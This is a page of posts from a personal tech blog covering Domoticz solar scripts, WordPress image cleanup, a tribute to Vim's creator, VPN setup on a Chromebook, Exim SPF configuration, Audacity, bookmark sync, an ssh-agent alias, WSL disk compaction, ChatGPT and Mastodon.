Category: Tech

  • How to add the total of two solar inverters in Domoticz

    How to add the total of two solar inverters in Domoticz

    I have two inverters — a SolarEdge and a GroWatt — and I want to combine the gross kWh output of both in one graph i.e. one Domoticz device.

    There are multiple ways to do this. Currently I have two different Domoticz devices that add the SolarEdge (via API) and GroWatt (via this script) output together. One device is called SumGenkWh and one called Total Today. They both give the same result, but the way of calculating is a bit different.

    10.6 kWh for both

    I spent way too long figuring this out, so this blog is for posterity.

    I actually found three ways to achieve this (above are the result of two), all solutions involve a DzVents script.

    The Domoticz forum helped me in the right direction but some details were missing.

    Method 1 Create a custom sensor

    This is the most straightforward. And I found this on the Domoticz forum. It is just a generic custom sensor. It just acts like a dumb counter. If that is all you need, great!

    This is the DzVents script, to add the values to the sensor.

    return {
          on = { 
            timer = {
               'every 5 minutes'            
            },
        }, 
        execute = function(domoticz, device, timer)
    	-- Replace between () the idx or 'name' of your solar panel devices or put -- in front of it if you don't use it
        	local vandaagKwhzon = domoticz.devices(509).counterToday
        	local vandaagKwhzon2 = domoticz.devices(514).counterToday 
    
     	-- Create a customsensor with Kwh as variable and replace the idx or 'name' with your device name or idx
        	local zonTotaal = domoticz.devices(556)
            
        	-- calculate total kWh
        	local kwhOpbrengst = tonumber(domoticz.utils.round((vandaagKwhzon + vandaagKwhzon2),2))   
          
        	-- update total custom sensor
        	zonTotaal.updateCustomSensor(kwhOpbrengst)
        end
    } 
    
    

    Method 2 create a third (dummy) inverter

    Create a device with the subtype of kWh. The difference from the first method is that this device acts like a generic inverter. Because it’s an electricity device (not just a counter). This means you can get the values (Watt and kWh) from the other two inverters, add them in a script and use the updateElectricity method to update this dummy ‘inverter’ with the total Watt and kWh values.

    Note: do not use WhToday, this is where I spent too much time! Use WhActual and WhTotal. Also see here.

    You can see the difference between the first method and second method in the image below: one (555) acts like an actual inverter and the Data is the sum total of both inverters. The other (556) is just a counter.

    Here is the DzVents script:

    return {
        on = {
            timer = { 'every 5 minutes' }
        },
        execute = function(domoticz, item)
            
            local SE = domoticz.devices(509)
            local GW = domoticz.devices(514)
            local SEGW = domoticz.devices(555)
    
            -- Calculate combined values
            local combinedWhActual = (SE.WhActual or 0) + (GW.WhActual or 0)
            local combinedWhToday = (SE.WhToday or 0) + (GW.WhToday or 0)
            local combinedWhTotal = (SE.WhTotal or 0) + (GW.WhTotal or 0)
    
            -- Print combined values
            print("Combined WhActual:", combinedWhActual)
            print("Combined WhToday:", combinedWhToday)
            print("Combined WhTotal:", combinedWhTotal)
    
            -- Update SEGW device with combined values
            SEGW.updateElectricity(combinedWhActual, combinedWhTotal)
        end
    }
    

    Method 3 sum of P1 delivery

    When you use a P1 interface you can also get the values from your delivery phases, that your P1 spits out to Domoticz. If you only have one phase, it’s literally the same graph as L1.

    If you have 3 phases (which you probably have when you have more than one inverter) you can of course add these phases together.

    I haven’t used this myself, but it shouldn’t be too difficult to add these values together with the use of the above scripts. It seems the value would be a little bit more precise.

  • Manage your WordPress wp-content folder

    Manage your WordPress wp-content folder

    My other blog has around 900 posts with 1,700 images in my WordPress Media Library. But my wp-content folder has over 20,000 images!

    That folder looks like this:

    The wp-content folder is a mess

    What is happening here!?

    What’s happening of course, is that WordPress tries to do a little bit too much thinking for you. And it creates lots of image resolutions and sizes — called thumbnails — when you upload an image. In my case up to 8 extra images were created on each image upload.

    Note: Your WordPress Media Library will only show you one image, but under the hood there are (in my case) up to 8 images. You can only see them on your file system.

    Thumbnails

    I love WordPress, but I don’t need WordPress to do that, because I don’t want a million files idling on my server.

    They take up space and are (in my case) mostly useless.

    Because the images I upload are usually already small and compressed and my posts have maybe one or two images. And my readers have fast connections, so speed is not really a big deal.

    Of course YMMV, but for my theme and use-case; I don’t need extra thumbnails.

    Here’s how I handle the images in my wp-content folder and how I got rid of all the unnecessary ones with these plugins.

    Disable thumbnails generation

    I use the Disable Generate Thumbnails plugin. Because it’s the most straightforward.

    Very simple configuration

    I have also used ThumbPress as an alternative.

    Some of these sizes are theme dependent some are based on the media settings and others are hardcoded into WordPress.

    You can also add a bit of PHP code that does this for you. But I chose a plugin.

    Both plugins will stop WordPress from creating all these specific thumbnail sizes.

    Imsanity

    https://wordpress.org/plugins/imsanity

    Install Imsanity and select a max resolution. This means whatever image you upload, it will be scaled down to this max.

    • You can choose to keep the originals or not.
    • And you can choose to do a bulk resize.
    • And automatically convert PNG to JPG. Great.
    Imsanity

    Imsanity is available per image from the Media List view. And you can resize per image.

    You can use Imsanity with wp-cli to resize in bulk!

    wp imsanity resize

    Note: it seems that using the wp-cli will not inform the media list i.e. the GUI of the resize. So in your media-list it will still show the old size (and have an option to scale it down, which has already been done)>

    WP-Optimize

    https://wordpress.org/plugins/wp-optimize

    WP-Optimize will compress your images even further. This is handy when you already have uploaded lots of images.

    WP-Optimize

    Summary

    So with these three plugins:

    • Disable Generate Thumbnails: No new thumbs are created
    • Imsanity: Uploaded images are automatically scaled down
    • WP-Optimize: Compress existing and new images even further

    And now the big reveal. How to get rid of all these already created thumbnails!

    Force Regenerate Thumbnails

    Install Force Regenerate Thumbnails. This awesome plugin will regenerate new thumbs and DELETE existing thumbs based on your current settings (i.e. none if you have set ‘Disable Generate Thumbnails’).

    I.e. in my case it will create zero new thumbs and cleanly delete all the old ones!

    You run it by selecting one or more media files from your Media Library and choosing the the Bulk action.

    Here you can see that it regenerated the thumbs for one image by deleting two existing sizes and creating none.

    Awesome!

    You can also see in the database that this plugin does a clean rewrite of the image metadata. This is absolutely necessary because if this doesn’t happen some themes will look for thumbs that are gone and you will end up with a blogpost with ‘missing’ images!

    Before
    After

    You can also do this with WP-CLI:

    wp media regenerate

    Handy if you want to run bulk actions.

    I would really love it if these three things were incorporated in one plugin or maybe even WordPress core (media regenerate more or less is). But I am happy this works and can keep control of my wp-content folder.

    Bonus: Media File Sizes

    It does what it says on the box. You can sort your Media Library based on size (this really should be a WordPress core feature).

    https://wordpress.org/plugins/media-file-sizes
  • The Legacy of Bram Moolenaar

    The Legacy of Bram Moolenaar

    This weekend we learned that Bram Moolenaar had passed away at the age of 62. And this news affected me more than I expected.

    Like so many: I did not know Bram personally. But I’ve been using a tool made by Bram for more than half my life — at least weekly, sometimes daily.

    That tool is a text editor. The best one there is: Vim.

    Bram Moolenaar (source: Wikipedia)

    Vim

    For those wondering: a text editor, what’s so special about that?

    Vim is not like any other piece of software. Vim is a special piece of software. The most apt description I could find is this one:

    Vim is a masterpiece, the gleaming precise machining tool from which so much of modernity was crafted.

    This description is not a hyperbole.

    Vim is the tool that was there when software took over the world. When modernity was created — i.e. everything we owe to computers — Vim was there.

    An essential tool to all of it.

    Like a power-drill, hammer or screwdriver, Vim is also a tool. A means, not an end. And a specific tool you must learn to use.

    And undoubtedly, various alternatives exist, yet Vim sets itself apart as a true precision instrument that, in the hands of adept users, has the power to craft exquisite and practical creations while eliciting immense pleasure and fulfillment in the process. Much like a skilled carpenter or watchmaker equipped with an array of specialized tools, Vim caters to those who engage earnestly with computers. Its seamless functionality and versatility provide a deeply gratifying experience, granting users the ability to shape their digital work with finesse and artistry.

    Another way to describe Vim is that Vim is a programmable editor. It’s the editor that you give commands — i.e. that you programas you program.

    When you learn Vim, when you use Vim, when you create with Vim; it becomes an extension of you. It’s a way of working, but more importantly: a way of thinking. Being sufficient in Vim is being able to almost work at the speed of thought. In a way, Vim is the closest thing to a neuralink we have.

    But this post is not about Vim (I highly recommend this video if you want to learn more), this post is about Bram.

    Bram

    Bram worked on Vim almost daily for over 30 years. Constantly tightening and improving it. An almost unprecedented achievement. A true labor of love.

    And you notice this when you use Vim. Everything works smoothly, it is fast and rock-solid. I can’t remember a single time in over 20 years when Vim froze or crashed.

    Vim, like many successful innovations, owes its origins to the contributions of those who came before. It stands on the shoulders of giants. It began as an imitation, derived from a port of a clone based on an idea by Bill Joy. However, Bram Moolenaar emerges as the true architect of Vim’s triumph and the evolution of vi-like editors. Bram is the giant on which they stand.

    Through Bram’s skillful craftsmanship, Vim has become an unparalleled piece of software that brings immense joy and satisfaction to its users. I vividly recall a moment 22 years ago when I had to ask someone how to close the editor, and the memory of that initial blush of shame has not faded entirely. And, even today, I find myself continuously discovering new features and capabilities in Vim, a testament to its rich and ever-expanding potential.

    Bram gave the world something very rich and powerful.

    And, Bram never asked for a penny for this. What Bram asked (at most) was to donate something, anything, to his foundation: ICCF Holland. In previous Vim versions, you would sometimes also see this friendly request when you started Vim.

    Vim’s code is open and free in the traditional sense, and Vim can be considered charity-ware, with its own license (which is compatible with GPL and more).

    And what all these little facts tell you is maybe all you need to know about Bram.

    And everything I’ve read over the past few days — herehereherehere and here  (and many more places) — about Bram confirms this image.

    The image of a hyperintelligent, dedicated, and selfless human-being.

    Someone who has made a major impact on the world of computer science.

    A Mensch.

    Someone who liked to share.

    (When I think of Bram I always think of his personal site where he shared his photos.)

    Sad

    Perhaps all these things add up to why it hit me when I read the news that Bram had passed away. In the message, his family made it clear that Bram was ill (‘a medical condition that progressed quickly over the last few weeks‘). This was unknown to most people and made the news all the more surprising.

    And it made me even sadder when someone pointed out Bram’s recent GitHub activity.

    Source

    The activity slowly fades away. It’s like a bright light went out and no one noticed.

    Bram’s legacy

    Vim is so intertwined with everything I do that I never doubted for a second that I can continue to use Vim. But when you see the GitHub activity, you can’t escape the thought that Vim was Bram and Bram was Vim. And Bram was of course the Vim BDFL for a reason.

    When someone like Ian Murdock passed away, there were clear structures in place that never put Debian in jeopardy. And when Linus Torvalds dies, I expect it to be the same.

    But is that also the case with Vim – Bram’s life work? I read on the mailing list that a number of longtime contributors will continue Vim. Of course. But what strikes me is that even those people — who were so close to the project — did not know about Bram’s medical condition. That must have been Bram’s deliberate choice and let’s respect that. But it does raise questions about the future of Vim.

    Time will tell what happens next. But one thing is certain. Vim is not going away. And Bram’s legacy is not a GitHub activity chart. Bram and Vim’s spirit are everywhere. Whether it is in new emerging editors or in the letters j and k that you show up in all kinds of unexpected places. Vim, the way of working, the way of thinking — the programmable editor — is an extremely powerful and valuable idea. One that’s been perfected by Bram and captured in the form of an almost perfect piece of software honed over 30 years. And even if Vim were to disappear, which I don’t expect, that idea is certainly not going to disappear. And that is Bram’s legacy.

    If you want to: please contribute and donate what you can in memory of Bram Moolenaar.

  • Using the SonicWall Connect Tunnel with Firefox on a Chromebook

    Yes, you read that correctly. Firefox on a Chromebook! Without tricks.

    Or at least, not many tricks.

    Why?

    When you want to use the SonicWall Connect Tunnel software (from the SMA 1000 Series) on your Chromebook the suggested SonicWall Mobile Connect app does not work properly. I don’t know why, but there is a solution.

    The solution

    In one sentence: install the (Java based) SonicWall VPN Connect Tunnel software and install Firefox in the Linux VM on your Chromebook.

    The result: Chrome and Firefox side by side with the Sonicwall Connect Tunnel.

    How?

    Here we go.

    Enable Linux virtual machine on your Chromebook: i.e. set up developer mode.

    This used to be a whole thing, now it is very easy.

    Just flip a switch in the settings. No joke.

    Dutch: but go to Settings and Developers

    Great! You now have an (almost) full-blown Linux OS at your disposal!

    You can do things.

    Next, start the Terminal app and select Penguin (this the default name on a Chromebook for your Linux VM).

    Select
    Click it

    You get a prompt.

    Prompt

    Next, download the SonicWall Connect Tunnel from within your terminal with wget.

    Get the correct URL from here.

    wget https://software.sonicwall.com/CT-NX-VPNClients/CT-12.4.2/ConnectTunnel_Linux64-12.42.00664.tar

    It looks like this

    Unpack the downloaded file:

    tar -xvf ConnectTunnel_Linux64-12.42.00664.tar

    Install it:

    sudo ./install.sh

    Next, install the Java Runtime, you need this for the SonicWall VPN:

    sudo apt-get install default-jre

    Install a webbrowser:

    sudo apt-get install firefox-esr

    Now you can start the Sonicwall VPN:

    startctui

    You are presented with the familiar SonicWall tool. And after connecting to your VPN, you can start your browser from your terminal (start a new terminal tab, the other one has startctui running):

    firefox-esr

    Or just use the Chromebook global search to find and start the Firefox browser.

    Being a GUI application installed in your container, somehow Chrome recognizes this and gives you the option to start it from the Chromebook menu and/or pin it to your dock.

    This does not work with the SonicWall GUI.

    And that’s it.

    The strange part is that Firefox is able to use the VPN connection, your regular Chrome browser won’t. I figured that his is probably for the same reason that the default SonicWall app does not work (maybe it does work with Firefox, something for you to try out!).

  • Correctly configuring incoming SPF in Exim on Debian

    The Debian documentation is sparse on how to correctly configure incoming SPF checks in the Debian Exim package.

    It is sparse in the sense that it tells you what to install (spf-tools-perl) but it is not clear WHERE to put the very important macro. It only says:

    This is provided via the macro CHECK_RCPT_SPF, set it to true.

    Fine, but where!?

    Answer: you should put this macro at the top of your configuration file (/etc/exim4/exim4.conf.template).

    At least I did and put it on line 23. After trying out different places.

    Next, you run:
    update-exim4.conf
    /etc/init.d/exim4 restart

    And that’s it. I couldn’t find it anywhere so I put it here.

    More on SPF

    With this setting, Exim will check your incoming mail for valid SPF records. Because the check was not in place on my server it was possible for spammers to say to my mailserver that they were sending mail on behalf of my mailserver!

    This is *not* what you want.

    SPF best practices

    When configuring this I also found I had a couple of mistakes in my SPF records.

    server.j11g.com instead of *.j11g.com
    1. I had set a SPF record on a wildcard (*.j11g.com) subdomain. But this does not work properly. Specify the subdomain, and configure the record.
    2. I was missing a MX record for the subdomain. Also specifically set this.
    3. There was an IPv6 error in my SPF record. A semicolon (of course). There are lots of sites to test your SPF records. Here is a good one and another. They will point out errors.
    4. I use an include in my SPF record. I am still not sure where to put it, but it looks like the best practice is to put it before the IP addresses. Like so:

      v=spf1 mx include:spf.solcon.nl ip4:157.90.24.20 ip4:212.84.154.148 ip6:2001:9e0:8606:8f00::/56 ip6:2a01:4f8:1c1c:79a1::/56 -all
    5. I switched from ~all to -all. To drop all mail that does comply with the SPF record.

    Tests

    me@remoteserver:~# telnet server.j11g.com 25
    Trying 157.90.24.20...
    Connected to server.j11g.com.
    Escape character is '^]'.
    220 server.j11g.com ESMTP Exim 4.92 Sat, 22 Jul 2023 10:17:30 +0200
    ehlo jan.com
    250-server.j11g.com Hello remotemachine.test [77.72.*.*]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-CHUNKING
    250-STARTTLS
    250 HELP
    MAIL FROM:info@posthistorie.nl
    250 OK
    RCPT TO:janvdberg@gmail.com
    550 relay not permitted
    RCPT TO: jan@server.j11g.com
    550-[SPF] 77.72.150.187 is not allowed to send mail from posthistorie.nl. 
    550 Please see http://www.openspf.org/Why?scope=mfrom;identity=info@posthistorie.nl;ip=77.72.*.*

    The log on the server looks like this:

    2023-07-22 10:18:03 H=remoteserver (jan.com) [77.72.*.*] F=<info@posthistorie.nl> rejected RCPT janvdberg@gmail.com: relay not permitted
    2023-07-22 10:18:29 H=remoteserver (jan.com) [77.72.*.*] F=<info@posthistorie.nl> rejected RCPT jan@server.j11g.com: SPF check failed.
  • Audacity Tips

    Audacity Tips

    This is a public note to myself for working with Audacity; which I don’t do too often, and I want to make sure I don’t forget it.

    I recently created a 5 hour music project: a DJ radio show.

    The finished project, it has 5 tracks with multiple audiofiles per track

    What I need from Audacity is:

    • Copy and paste audiofiles together (cut, split, trim files): easy enough. Audacity is very intuitive for these kinds of things.
    • Have a bit of backgroud music (jingles/tunes) over someone talking: so align or layer tracks.
    • Fade tracks in and out.
    • Export to one big file.

    That’s mostly it.

    Audacity is a very powerful tool, but also great for just these few things.

    Tips

    The biggest challenge when working with different audiofiles are volume differences. So most of these tips revolve around making sure the volume is correct.

    Do not use the GAIN slider!

    Firstly: do NOT use the gain sliders (at the beginning of each track) to adjust volume. This will bite you in the butt later. Especially when you have lots of different audiofiles on one track (which I have).

    Do not touch this slider!

    This might work if you have maybe one or two tracks. But in my case, adding different audio files (with different volumes!) to the same track; the gain slider becomes useless. This is the reason I five tracks, I used the gain slider on one of the tracks in the beginning. I later found out that this was a dumb move and it was too much work to retweak the volume of the audiotracks, so I left the gain as it was, and started a new track.

    The tip is: use effects to change the volume of audiofiles!

    Note: For all of the effects to work you first need to select (part) of a track or audiofile.

    Effects: Amplify

    Amplify voice tracks (especially), and always use the recommended setting. Audacity knows how much it can amplify. Do this.

    Under Effect -> Volume and compression.

    Effects: Compressor

    Compress with -30 / -60 / 3:1 / 0.10 / 1.0. I picked these settings up from here.

    This will top off peaks, and boost your voice tracks to a maximum for much louder and clearer sound.

    Under Effect -> Volume and compression.

    Effects: Fade-in / Fade-out

    Use these to fade tracks in and out. Or crossfade tracks.

    Select part of a track and select either In or Out.

    Use longer or shorter stretches, listen to what sounds right.

    Effects: Normalize

    If you want to reduce volume, use this. Play around with the setting. Again: do not use the gain sliders. The great thing is (as with most effects) you can use it on parts of an audiofile. Just select the part you want to normalize or amplify.

    Also: see the Envelope Tool below (I did not know about this tool after finishing my project).

    Export to MP3

    I use the default settings. Audacity does the mix for you when you export your project (File->Export->Export as MP3). So I don’t mix everything down to one file before exporting (Tracks->Mix), there is no reason and you can’t really tweak your project anymore afterwards.

    Overall Audacity does a good job of creating a good mix.

    Things I later learned

    After I finished the project I was pretty happy with the result but I picked up two new tips from this great YouTube video:

    I have not used the next two effects, but for a next project I definitely might.

    Effects: Auto Duck

    Duck part of a track so the volume is lower. Great for voice-overs.

    Auto Duck

    Envelope Tool

    With the Envelope Tool (F2) you can drag and slide the volume of an audio file. Amazing.

    Envelope Tool

    One thing I wish I knew

    Audacity is really good, I love it. There is one thing however — I am pretty sure there probably is a shortcut for — but I have not figured it out yet.

    When cutting an audiofile at the end or beginning (which I did a lot near the end of the project), the length of the audiofile shrinks and the audiofile MOVES to fill the newly created gap! But every other track/audiofile after does not move. So I wish I knew how to automatically move ALL tracks and audiofiles over to fill the newly created gap all while keeping all the tracks correctly aligned.

    What I do now is (after the cut) select everything (with my mouse) and move it to fill the gap. Seems there should be an easier way to do this.

  • Floccus is the bookmark manager you have been looking for

    Floccus is the bookmark manager you have been looking for

    Floccus does exactly what you want because Floccus doesn’t break your bookmark management flow.

    The flow being: adding, changing, removing, moving bookmarks *in* your browser, straight from the bookmark bar and with the shortcuts you already know.

    Because Floccus is nothing more than a browser extension.

    Screenshot of the Floccus Chrome extension

    How does it work?

    Floccus is actually not a bookmark manager — because your browser does that already!

    FLOCCUS IS JUST A SYNC TOOL.

    Floccus periodically makes an .xml file of all your bookmarks (the bookmarks, the bookmark folders, the positions etc.). All the bookmarks that you see on your bookmark bar.

    And the MAGIC is that it stores and syncs this file on a central location: WebDav, Nextcloud or Google Drive (I use this).

    It works like this.

    You connect Floccus extension to your Google Drive on one browser, this is your Floccus account. Now you can export this account (a json file) and import it on all your other browsers.

    Import and export screen: a one time setup

    The Floccus extension that sits in all your browsers does nothing more than periodically sync this file and merge changes (when necessary): new bookmarks or deletions will sync to all browsers because the Floccus extension “manages” the bookmarks (based on the xml file).

    That’s it.

    It’s so elegant and simple that at first I didn’t get it. Sure there are options available for sync behavior, sync interval, folder mapping, setting a passphrase and more. But for most people the defaults are fine.

    I use Floccus to sync two browsers (Brave @ work and Chrome @ home) and I absolutely love it! All my bookmarks are available on any browser I use (Chromium, Google Chrome, Mozilla Firefox, Opera, Brave, Vivaldi and Microsoft Edge are all supported).

    Floccus is the bookmark “manager” I have been looking for!

  • Simple jumphost ssh-agent config

    You can find many tutorials online on how to use ssh-agent or ssh-ident correctly.

    This is a short and simple two line fix aimed at a specific use i.e. a single connection to a jumphost.

    Add this to your .bashrc

    alias jump='eval ssh-agent && ssh-add ~/.ssh/id_rsa && ssh -A -i "~/.ssh/id_rsa" jan@jumphost.domain.name'

    So now when you type jumphost:

    • An ssh-agent will start
    • Relevant keys are added to the agent
    • You ssh to the jumphost with agent forwarding (-A)

    And from the jumphost you can ssh connect to anywhere because you forwarded your keys.

    Possible drawbacks:

    • The primary benefit is that with this method your ssh keys stay on your local machine (and not on e.g. the jumphost). But it also means you still have to enter your ssh passphrase for each session: in my case this is not a problem I usually need one session to my jumphost. If you set up lots of sessions, this may be a problem because you have to keep entering your passphrase (usually one of the reasons of running ssh-agent in the first place) and every session starts it’s own ssh-agent.
      If you do not use as ssh passphrase this is not an issue (though you really should use a passphrase).
    • Your ssh-agent will run forever. So add this to ~/.bash_logout
    pkill ssh-agent

    Drawbacks:

    • *Any* bash logout will kill your ssh-agent. Again: not a problem if you just use one session at a time.

    This setup works for quick access from a let’s say a secondary machine to my jumphost, to quickly check some things. On my primary machine (for real work) I just use this.

  • Compact WSL partition and reclaim storage space

    Start PowerShell

    wsl --shutdown

    Find where your WSL vhdx file is located. Usually under:

    C:\Users\yourname\AppData\Local\Package\Linuxdistroflavour\LocalState\ext4.vhdx

    Start diskpart (from PowerShell or CMD): diskpart.exe

    Run:

    select vdisk file="C:\Users\Jan van den Berg\AppData\Local\Packages\TheDebianProject.DebianGNULinux_76v4gfsz19hv4\LocalState\ext4.vhdx"

    and next:

    compact vdisk

  • I don’t understand terminals, shells and SSH

    Confession time: I don’t fully understand how terminals, shells and SSH really work (and my guess is you don’t either). And I don’t mean the cryptography behind SSH. I mean how SSH and the terminal — and the shell for that matter — interact with one another.

    I recently realized that even though I’ve been daily remotely logging into Linux systems for all of my adult life (and type in the shell and Vim) I didn’t really grasp how these things actually work.

    Of course I conceptually know what a (virtual) terminal is (entering input and displaying output) and what the shell is for (the interpreter). And SSH is the remote login protocol, right? (Or is SSH a pseudoterminal inside another pseudoterminal, who’s to say)?

    The distinction between these three elements is a bit fuzzy and I do not have a clear concept of it in my head. The test being: could I draw it on a whiteboard? Or: could I explain it to a novice? The answer is probably: not really.

    So I went on a bender and found these four (well-known) links that explain things like tty, rawmode, ptms/ptx, pseudoterminals and more.

    This post functions as a bookmark placeholder. I will add more links when I find them.

    There’s lots of information here if you’re interested. And of course: you mostly don’t actually need to know any of these things to do your work — we are all forever standing on the shoulders of giants. But I *want* to understand these things. And I think I understand them a little bit better now. Maybe you will as well.

  • ChatGPT and humans as prompt fodder

    ChatGPT and humans as prompt fodder

    I woke up Sunday morning with an unnerving feeling. A feeling something had changed. A disturbance in the force if you will.

    I know that look

    Mainstream media seems blissfully unaware of what happened. Sure, here in the Netherlands we had a small but passionate demonstration on primetime TV, but e.g. the NY Times so far has *nothing* 🦗🦗

    But something most definitely happened. My personal internet bubble has erupted the last few days with tweets and blogposts and it was the top story on every tech site I visit. I have never seen so many people’s minds blown at the same time. It has been called the end of the college paper as well as the end of Google. Things will never be the same. Or so they say.

    Top three

    I am of course talking about ChatGPT by OpenAI it is based on GPT-3. It’s not AGI, but it’s definitely a glimpse of the future.

    This post is to gather some thoughts and …. to test this thing.

    When GPT-2 came out a few years ago it was impressive, but not in an earth shattering kind of way. Because you could still place it on a scale of linear progress. That this thing existed made sense. And it was mostly fun and also a bit quirky. People experimented with it, but the hype died down soon enough iirc. This was however the prelude.

    GPT-3 was already lurking around the corner and promised to be better. Much better. How much? From what we can see now in the ChatGPT implementation the differences are vast. It is not even in the same ballpark. It is a gigantic leap forward. To justify the difference with GPT-2, GPT-3000 would be a better name than the current name.

    GPT-3000

    Deceptively mundane start screen

    The impressiveness is twofold:

    • The correctness. ChatGPT all feels very real, lifelike, usable or whatever you want to call it. The quality of output is off the charts. It will surpass any expectations you might have.
    • The breadth. There seems to be no limit to what it can do. Prose, tests, chess, poetry, dances (not quite yet), business strategy analysis, generating code or finding errors in code or even running virtual machines (!?) and simulating a BBS. It can seemingly do anything that is text related; if you are creative enough to make it do something.

    Sure it’s just ‘a machine learning system that has been trained to generate text and answer questions’. But this goes a long way (of course there are also critical voices).

    And for the record: I was surprised by a lot of examples I saw floating online. Even though I shouldn’t have been.

    Unlike any other technology that came before, GPT-3 announces loud and clear that the age of AGI is upon us. And here is the thing; I don’t know how to feel about it! Let alone try and imagine GPT-4. Because this is only the beginning.

    GPT-3 is proof that any technology that can be developed, will be developed. It shares this characteristic with every other technology. But there is another famous human technology it shares a specific characteristic with i.e. the atomic bomb. The characteristic being: just because we could, doesn’t always mean we should.

    This guy knows

    But alas, technology doesn’t wait for ethics debates to settle down.

    And now it’s here, let’s deal with it.

    First thoughts

    I am no Luddite, though I am very much a believer that new things are not necessarily better, just because they’re new. But with GPT-3 I do feel like a Luddite because I can’t shake the feeling we are on the brink of losing something. And in some cases — within a matter of days — we have already lost something; which was ultimately inevitable and also happened extremely fast.

    Me?

    People have always been resistant or hesitant when new tools arrive. Take the first cameras — or decades after those, the digital cameras — instead of seeing possibilities, people initially felt threatened. Which is a very human reaction to new things that challenge the old way of doing things. It’s the well-known paradoxical relation we have with innovation of tools. Paradoxical, because in the end the new tools mostly always win. As they should. Tools are what makes us human, it’s what separates us from almost every other living being. Tools pave the way forward.

    And this is just another tool. Right?

    But here is the crux. Somehow this seems to be more than just a tool. The difference being that the defining characteristic of a tool is that it enhances human productivity and GPT-3 seems to hint at replacing human productivity.

    Decades of hypothetically toying and wrestling with this very theme (i.e. can AI replace humans?) in sci-fi has all of a sudden become a very real topic for a lot of people.

    No, I do not think it is sentient. But it can do an awful lot.

    The future belongs to optimists

    Let’s try and look at the arrival of GPT-3 from an optimistic perspective (yes, this could be a GPT-3 prompt). My optimistic approach is that GPT-3 (and AGI next) will force us to make us more human. Or even better: it will show us what it means to be human.

    Because GPT-3 can do everything else and do it better (for arguments’ sake lets just assume that better is better and steer away from philosophical debate about what better even means).

    GPT-3 will cause the bottom to fall out of mediocrity, leaving only the very best humans have to offer. Anything else can be generated.

    So what is that very best that makes us human? What is it that we can do exclusively, that AGI can never do? What is so distinctly human that AGI can never replicate it?

    One of the first things that came to mind for me was whether AGI could write something like Infinite Jest or Crime and Punishment. Literature. Earthshattering works of art that simultaneously define and enhance the human experience. Literature in my opinion is the prime example of the ultimate human experience. Could AGI … before even finishing this question: yes, yes it could.

    Is that a bad thing?

    What we’re seeing is the infinite monkey theorem in action. AGI can and will produce Shakespeare. The data is there. We have enough monkeys and typewriters.

    Not a typewriter. But you know the scene.

    As long as you feed it enough data it can do anything. But who feeds it data? Humans (for now). I am not ready to think what happens when AI starts to talk to AI (remember Her?). For now it feeds and learns from human input.

    What are you smiling about?

    Maybe AGI is where we find out we are just prompt fodder and humans are not so special after all? Maybe that’s why I woke up with an unnerving feeling.

    The proof is in the pudding

    Or maybe, it is because ChatGPT could enhance everything I have written so far and make it more clear and concise.

    Because it definitely can.

    Of course I tried this and it gave the following suggestions.

    First part

    The blog post was too long so I had to cut it in two parts.

    I agree

    Second part

    The first paragraph here is actually the eight etc.

    This is good advice

    I have chosen to keep the original text as-is with the screenshot suggestions so you can see the difference.

    It is really good. What more can I say?

  • Five things I’d like to see in Mastodon

    I love Mastodon. I am a believer.

    Not that I think it will replace Twitter or anything like that. But it is definitely its own thing. True to the original ideas of the internet.

    There are however a few things I would really like to see. In no particular order.

    Threads

    Threads in the timeline feel clunky. I see replies to long running threads scattered through my timeline. They are hard to follow and they make the timeline messy. Threads should be bundled together more coherently in my timeline.

    Algorithm

    There I said it. I *do* think there is room for an algorithm on Mastodon. Specifically one that is proposed by jefftk in his blogpost ‘User-Controlled Algorithmic Feeds’.

    It makes a lot of sense since the user is in control.

    Hover for profile

    Easy one I think. I want to hover over a (profile)name and get a popup with the most relevant information for that profile without going to that profile! I don’t want to leave my timeline. It’s since switching to Mastodon that I noticed how much I rely on this (also see: Verification 👇).

    Advanced View

    Could be more advanced. I want different (more!) and persistent columns for different hashtags or searches.

    Verification

    Sure rel=me is one way to verify. But with more and more brands and people moving to Mastodon I’d like to see another (better?) way to verify accounts. Not everyone has their own site.

    But, this is hard. Also see bird-site. And I also don’t have a solution.

    I do like presscheck.org though. It’s a good effort. But I worry how this scales.


  • How to get green links on your Mastodon profile with WordPress

    How to get green links on your Mastodon profile with WordPress

    The green links on your Mastodon profile indicate that you are the owner of that link i.e. that website.

    You can achieve this by adding a little line of code to your website (see Link verification).

    When you have a basic HTML website, adding this piece of code is this trivial.

    However when your site runs on WordPress, it’s a bit different.

    I found a tutorial that only works with a newer version of Gutenberg (in anticipation of a 2023 WordPress release). But there is also another — easier — way.

    When you run a regular WordPress 6.1 site, this is how you do it.

    I link to my social media profiles from a menu. My guess is that most people want to use it like this. And one of these links in my menu is a Mastodon link. This is the link where you need to add the me value for the rel attribute.

    These are the steps:

    1. Select Appearance
    2. Select Menus
    3. Select your specific Menu (in my case Social Footer Menu).
    4. Select Screen Options
    5. Checkmark the Link Relationship (XFN)
    6. add me to your menu under Link Relation (XFN).
    7. Save!

    Step 5 is the trick. This step will add an extra — otherwise hidden — option field to your links.

    I got this tip from this here.

    Now you just have to wait for your Mastodon instance to check your links. This happens periodically (I would say daily?). But I notice you can also trigger this check by (making a change and) saving your Mastodon profile.

    And that’s it.

    Look how green!

    Your Mastodon instance will check your links periodically. But I notice you can also trigger it by (making a change and) saving your profile.

  • Welcome to the Fediverse

    Welcome to the Fediverse

    It was 2017 when I signed up for the Dutch instance of Mastodon. The newfangled thing. But it wasn’t until last week that it *clicked*.

    It clicked for two reasons.

    Forget the Metaverse

    Mastodon is part of the fediverse. Meaning it shares the core principles of the fediverse. With a little bit of reading, I got a better understanding of what the fediverse actually is, and how Mastodon fits in.

    https://axbom.com/fediverse/

    The idea is as old as it is clever. And it really is clever.

    Technically the fediverse “is a collection of community-owned, ad-free, decentralised, and privacy-centric social networks“.

    Let’s expand the explanation with an emphasis on what this means for a user:

    The fediverse is a collection of community-owned, ad-free, decentralised, and privacy-centric social networks where a user can create a personal account on any specific instance but can connect to everyone else on every other instance.

    Distributed instances is the key idea here.

    The fediverse has many applications. There even is a reading sharing application (why didn’t I think of this?). But for now let’s focus on Mastodon. The fediverse microblog equivalent. Every user on any Mastodon instance can connect to any other user on any other Mastodon instance (mostly). And all these instances are run by different people.

    Just like email

    The best analogy might be email. You can roll your own email server, use your company’s email server, or Gmail or Outlook or what have you. But — and this is important — you can send and receive email to and from anyone with a valid email address.

    Just like you can with a Mastodon address, powered not by SMTP but the ActivityPub protocol.

